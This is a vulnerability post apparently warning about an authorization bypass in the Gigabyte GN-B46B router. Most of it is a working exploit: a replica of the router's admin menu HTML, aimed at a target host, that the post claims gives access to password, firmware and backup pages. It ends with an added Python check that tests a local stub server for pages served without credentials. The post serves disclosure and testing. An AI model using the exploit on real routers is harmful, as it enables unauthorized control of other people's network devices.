人不機車罔少年~機 | [Warning] Gigabyte Technology wireless GN-B46B authentication vulnerability

Official product information: http://www.giga-byte.com.tw/Communic...ss_GN-B46B.htm

This bug is an amazing Authorization Bypass, almost unexplained. The server protects all its files with "Basic Authorization". The Authorization cannot be bypassed in any other way except by requesting the files on the router from the html menu of the router. The problem is that this protection should work only when the html menu of the router is on the router itself. However, if an attacker uses the router's menu from a local html, it will bypass the authorization and the attacker will be logged in. Truly amazing, exceptional.

Attack code example:

```html
<html>htdocs
<head>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="expires" CONTENT="0">
<STYLE> #foldheader {CURSOR: hand}</STYLE>
<base href="http://<host>">
<script language="javascript">
<!--
var lastIndex=-1;
function change(){
  if (event.srcElement.id=="foldheader") {
    var srcIndex = event.srcElement.sourceIndex
    var nested = document.all[srcIndex+2]
    if (nested.style.display=="none") {
      nested.style.display=''
      if (lastIndex>=0) {
        nested = document.all[lastIndex]
        nested.style.display="none"
      }
      lastIndex=srcIndex+2;
    }
    else {
      lastIndex=-1;
      nested.style.display="none"
    }
  }
  if (event.srcElement.id=="foldimage") {
    var srcIndex = event.srcElement.sourceIndex
    var nested = document.all[srcIndex+1]
    if (nested.style.display=="none") {
      nested.style.display=''
      if (lastIndex>=0) {
        nested = document.all[lastIndex]
        nested.style.display="none"
      }
      lastIndex=srcIndex+1;
    }
    else {
      lastIndex=-1;
      nested.style.display="none"
    }
  }
}
window.self.document.onclick=change
if(document.images){
  image1off=new Image
  image1off.src="../picture/button_setup.gif"
  image1on=new Image
  image1on.src="../picture/button_setup_over.gif"
  image2off=new Image
  image2off.src="../picture/button_status.gif"
  image2on=new Image
  image2on.src="../picture/button_status_over.gif"
  image3off=new Image
  image3off.src="../picture/button_logout.gif"
  image3on=new Image
  image3on.src="../picture/button_logout_over.gif"
}
function imgOn(imgName){
  if(document.images){
    document[imgName].src=eval(imgName+"on.src")
  }
}
function imgOff(imgName){
  if(document.images){
    document[imgName].src=eval(imgName+"off.src")
  }
}
function MoveOn(which_log, item) {
  dd = new Date();
  time = dd.getTime();
  offset = dd.getTimezoneOffset();
  item.href = '../cgi-bin/SetData.cgi?LogMenu' + which_log + '\+' + Math.round(time/1000) + '\+' + offset;
}
//-->
</script>
<title>English</title>
<style type="text/css">
body{font-family: Arial,verdana,Helvetica; font-size: 10pt; line-height: 18px;background:#ffffff;}
.blueBg {background:#79A7EF;}
.blackBg {background:#000000;}
.grayBg {background:#EEEEEE;}
.lightBlueBg {background:#9FBEEE;font-size:10pt;color:#000000;font-weight:bold;}
.lightBlackBg {background:#000000;font-size:10pt;color:#FFFFFF;font-weight:bold;}
.whiteBg {background:#ffffff;}
.redText {color:#FF9000;}
.tagText {color:#FF9000;font-weight:bold;background:#ffffff;}
.blueText {color: rgb(0,0,0);}
.orangeText {color:#FF9000;font-weight:bold;}
.heading{color:#000000;font-size:10pt;font-weight:bold;background:#ECF2F4;}
.heading1{color:#3333CC;font-size:10pt;background:#Eeeeee;}
.heading2{color:#3333CC;font-size:10pt;font-weight:bold;background:#ECF2F4;}
.headingLink{font-size:10pt;font-weight:bold;color:#ffffff;}
.title{color:#ffffff;font-size:20pt;font-weight:bold;background:#9FBEEE;}
.titleSub{color:#3333CC;font-size:15pt;font-weight:bold;background:#ffffff;}
.titleSub1{color:#000000;font-size:13pt;font-weight:bold;background:#ffffff; }
.buttonText{background-color: rgb(255,144,0);color:#ffffff;font-weight:bold;}
A:link {color:#FFFFFF; font-style: normal; cursor: hand;text-decoration:none;}
A:visited {color:rgb(255,255,255); font-style: normal;text-decoration:none;}
A:active {color:#9FBEEE; font-style: normal;text-decoration:none;}
A:hover {color:#9FBEEE; font-style:bold;text-decoration:underline;}
</style>
</head>
<BODY style="background-color: #000000">
<center>
<table cellpadding=0 cellspacing=0 border=0 width=180 class="blackBg">
<tr> <td height="25" colspan="3"><img src="../picture/spacer.gif" width="1" height="1"></td> </tr>
<tr> <td colspan="3"><a href="/htdocs/BasicLANSetup.htm" target=main onMouseover="imgOn('image1')"; onMouseout="imgOff('image1')">
  <img src="../picture/button_setup.gif" border="0" name="image1" width="184" height="23"></a></td> </tr>
<!-- <tr> <td colspan="3"><a href="/htdocs/status.htm" target=main onMouseover="imgOn('image2')"; onMouseout="imgOff('image2')">
  <img src="../picture/button_status.gif" border="0" name="image2" width="184" height="31"></a></td> </tr> -->
<tr> <td colspan="3"><a href="../cgi-bin/SetData.cgi?ShowStatus" href="status.htm" target=main onMouseover="imgOn('image2')"; onMouseout="imgOff('image2')">
  <img src="../picture/button_status.gif" border="0" name="image2" width="184" height="31"></a></td> </tr>
<tr> <td colspan="3"><a href="/htdocs/Logout.htm" target=_top onMouseover="imgOn('image3')"; onMouseout="imgOff('image3')">
  <img src="../picture/button_logout.gif" border="0" name="image3" width="184" height="29"></a></td> </tr>
<tr> <td colspan="3" height="8"><img src="../picture/spacer.gif" width="1" height="1"></td> </tr>
<tr> <td colspan="3"> <img src="../picture/button_advancedSetup.gif" border="0" width="174" height="34"></td> </tr>
<tr>
<td background="../picture/border_left.gif"> <img src="../picture/border_left.gif" width="15" height="19"></td>
<td>
<table cellpadding="0" cellspacing="0" border="0" width="160" class="lightBlackBg">
<tr> <td height="5"><img src="../picture/spacer.gif" width="1" height="1"></td> </tr>
<tr> <td valign="top" id="foldheader"> <img src="../picture/icon_list.gif" align="absmiddle" id="foldimage" border="0" width="7" height="7"> Network Configuration
  <table id="network" border="0">
  <tr class="headingLink"><td> <a href="NetworkSetup3.htm" target=main ><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> LAN Configuration</a></td></tr>
  <tr class="headingLink"><td> <a href="NetworkSetup2.htm" target=main ><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> WAN Configuration</a></td></tr>
  <tr class="headingLink"><td> <a href="NetworkSetup1.htm" target=main ><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> WAN Setting</a></td></tr>
  </table>
</td> </tr>
<tr> <td valign="top" id="foldheader"> <img src="../picture/icon_list.gif" align="absmiddle" id="foldimage" border="0" width="7" height="7"> Wireless Configuration
  <table id="wireless" border="0">
  <tr class="headingLink"><td> <a href="WirelessSetup2B.htm" target=main ><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> 802.11b</a></td></tr>
  <tr class="headingLink"><td> <a href="MACcontrol11b.htm" target=main ><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> MAC Access Control</a></td></tr>
  </table>
</td> </tr>
<tr> <td valign="top"><a href="/htdocs/StaticRouting.htm" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> Static Routing Table</a></td> </tr>
<tr> <td valign="top" id="foldheader"> <img src="../picture/icon_list.gif" align="absmiddle" id="foldimage" border="0" width="7" height="7"> Virtual Server
  <table id="virtual" border="0">
  <tr class="headingLink"><td> <a href="VirtualServer1.htm" target=main ><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> DMZ</a></td></tr>
  <tr class="headingLink"><td> <a href="VirtualServer2.htm" target=main ><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> PPPoE/DHCP/Static</a></td></tr>
  <tr class="headingLink"><td> <a href="VirtualServer3.htm" target=main ><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> PPPoE Unnumber</a></td></tr>
  </table>
</td> </tr>
<tr> <td valign="top" id="foldheader"> <img src="../picture/icon_list.gif" align="absmiddle" id="foldimage" border="0" width="7" height="7"> Firewall Rule
  <table id="firewall" border="0">
  <tr class="headingLink"><td> <a href="Firewall1.htm" target=main ><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> Security</a></td></tr>
  <tr class="headingLink"><td> <a href="Firewall3.htm" target=main ><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> VPN Pass Through</a></td></tr>
  <tr class="headingLink"><td> <a href="Firewall2.htm" target=main ><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> Static Rule</a></td></tr>
  </table>
</td> </tr>
<tr> <td valign="top"><a href="/htdocs/DNSReplay.htm" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> DNS Replay</a></td> </tr>
<tr> <td height="7"><img src="../picture/spacer.gif" width="1" height="1"></td> </tr>
</table>
</td>
<td background="../picture/border_right.gif"> <img src="../picture/border_right.gif" width="19" height="19"></td>
</tr>
<tr> <td colspan="3"> <img src="../picture/button_management.gif" border="0" width="174" height="31"></td> </tr>
<tr>
<td background="../picture/border_left.gif"> <img src="../picture/border_left.gif" width="15" height="19"></td>
<td>
<table cellpadding="0" cellspacing="0" border="0" width="160" class="lightBlackBg">
<tr> <td height="5"><img src="../picture/spacer.gif" width="1" height="1"></td> </tr>
<tr> <td valign="top"><a href="../cgi-bin/SetData.cgi?ShowPPPMonitor" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> PPP Monitor</a></td> </tr>
<tr> <td valign="top"><a href="/htdocs/Reboot.htm" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> Reboot</a></td> </tr>
<tr> <td valign="top"><a href="/htdocs/Initialization.htm" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> Initialization</a></td> </tr>
<tr> <td valign="top"><a href="/htdocs/ChangePassword.htm" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> Change Password</a></td> </tr>
<tr> <td valign="top"><a href="/htdocs/ChangeMAC.htm" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> Change WAN MAC</a></td> </tr>
<tr> <td valign="top"><a href="/htdocs/UpgradeFirmware.htm" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> Upgrade Firmware</a></td> </tr>
<tr> <td valign="top"><a href="/htdocs/BackUpRestore.htm" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> BackUp/Restore</a></td> </tr>
<tr> <td valign="top" id="foldheader"> <img src="../picture/icon_list.gif" align="absmiddle" id="foldimage" border="0" width="7" height="7"> Log Information
  <table id="log" border="0">
  <tr class="headingLink"><td> <a href="#" target=main onclick="MoveOn('firelog', this)"><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> Firewall Log</a></td></tr>
  <tr class="headingLink"><td> <a href="#" target=main onclick="MoveOn('connlog', this)"><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> WAN Connection</a></td></tr>
  <tr class="headingLink"><td> <a href="#" target=main onclick="MoveOn('upnplog', this)"><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> UPnP Log</a></td></tr>
  </table>
</td> </tr>
<!-- <tr> <td valign="top"><a href="../cgi-bin/SetData.cgi?LogMenufirelog+0+0" target=main onclick="MoveOn('firelog')"> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> Log Information</a></td> </tr> -->
<tr> <td valign="top"><a href="/htdocs/Save.htm" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> Save Maintenance</a></td> </tr>
<tr> <td valign="top"><a href="../others/Help.English.htm" target="_blank"> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> Help</a></td> </tr>
<tr> <td valign="top"><a href="/htdocs/Ping.htm" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> Ping</a></td> </tr>
<tr> <td valign="top"><a href="/htdocs/About.htm" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> About</a></td> </tr>
<tr> <td height="5"><img src="../picture/spacer.gif" width="1" height="1"></td> </tr>
</table>
</td>
<td background="../picture/border_right.gif"> <img src="../picture/border_right.gif" width="19" height="19"></td>
</tr>
<tr> <!--<td colspan="3"><img src="../picture/banner_bottom.gif" width="184" height="38"></td>--> </tr>
<tr> <td colspan="3" height="20"><img src="../picture/spacer.gif" width="1" height="1"></td> </tr>
</table>
</center>
</body>
</html>
<script language="javascript">
if(navigator.appName == "Microsoft Internet Explorer" && parseInt(navigator.appVersion) >= 4) {
  network.style.display = "none" ;
  wireless.style.display = "none" ;
  virtual.style.display = "none" ;
  firewall.style.display = "none" ;
  log.style.display = "none" ;
}
</script>
```
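A defender-side check for the condition the advisory describes, added here as an example (not code from the original post or from Gigabyte): it requests admin pages named in the quoted menu with no credentials and reports any that are not refused with 401. The stub server, its credentials and all function names are constructed for the demonstration; the stub's gap is hypothetical and does not model the router's actual flaw.

```python
import base64
import http.client
from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Thread

# Admin pages named in the menu HTML quoted in the post.
ADMIN_PATHS = ["/htdocs/ChangePassword.htm", "/htdocs/UpgradeFirmware.htm",
               "/htdocs/BackUpRestore.htm", "/cgi-bin/SetData.cgi?ShowStatus"]
EXPECTED = "Basic " + base64.b64encode(b"admin:constructed-password").decode()  # stub only

def pages_served_without_auth(host, port, paths):
    """Paths that answer anything but 401 + WWW-Authenticate when no Authorization header is sent."""
    exposed = []
    for path in paths:
        conn = http.client.HTTPConnection(host, port, timeout=5)
        try:
            conn.request("GET", path)
            resp = conn.getresponse()
            resp.read()
            if resp.status != 401 or not resp.getheader("WWW-Authenticate"):
                exposed.append(path)
        finally:
            conn.close()
    return exposed

def make_stub(protect_all):
    """Constructed stand-in server, not the router firmware; protect_all=False guards /htdocs/ only."""
    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            guarded = protect_all or self.path.startswith("/htdocs/")
            denied = guarded and self.headers.get("Authorization") != EXPECTED
            self.send_response(401 if denied else 200)
            if denied:
                self.send_header("WWW-Authenticate", 'Basic realm="admin"')
            self.end_headers()
        def log_message(self, *args):  # keep the demo quiet
            pass
    srv = HTTPServer(("127.0.0.1", 0), Handler)
    Thread(target=srv.serve_forever, daemon=True).start()
    return srv

def run_demo():
    results = {}
    for name, protect_all in (("gap", False), ("strict", True)):
        srv = make_stub(protect_all)
        results[name] = pages_served_without_auth("127.0.0.1", srv.server_port, ADMIN_PATHS)
        srv.shutdown()
        srv.server_close()
    return results
```

Calling `run_demo()` returns the exposed paths for each stub; on real equipment you administer, an empty list from `pages_served_without_auth` is the expected result.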